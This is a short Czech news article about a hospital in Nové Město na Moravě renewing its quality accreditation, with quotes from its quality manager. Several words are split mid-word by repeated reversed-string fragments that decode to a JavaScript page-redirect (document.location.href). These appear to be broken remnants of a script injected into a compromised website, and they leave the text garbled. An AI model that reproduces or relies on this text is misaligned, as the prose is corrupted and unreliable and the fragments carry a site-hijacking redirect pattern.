Rainbow page separator

Novoměstská nemocnice obhájila akreditaci na další tři roky

Středa, 29. listopadu 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Na další tři roky prodloužila Spojená akreditační komise novoměstské nemocnici akreditaci, která souvisí se zvyšováním kvality a bezpečí posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných služeb. „Tím, že dojde k přesnému popisu vybraných, obvykle rizikových procesů, zvýší se pravděpodobnost, že pracovníci budou ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to procesy provádět stejným způsobem, a minimalizuje se tak nežádoucí variabilita. Pro zaměstnance nemocnice znamená akreditace velký kus práce,“ uvedla manažerka kvality Bohdana Marečková.
Akreditační komise stanovuje osm resortních cílů, jako je například bezpečnost při používání léčivých přípravků s vyšší mírou rizika, prevence pádů pacientů, prevence vzniku proleženin u hospitalizovaných pacientů, zavedení optimálních postupů hygieny rukou při posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování zdravotní péče a další. „U všech jsme v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce dostali plný počet bodů,“ doplnila Marečková.
Nemocnice prochází akreditačním procesem od roku 2009, přičemž každé tři roky absolvuje šetření pro obnovu certifikátu. Stávající akreditace je platná do 26. října 2020.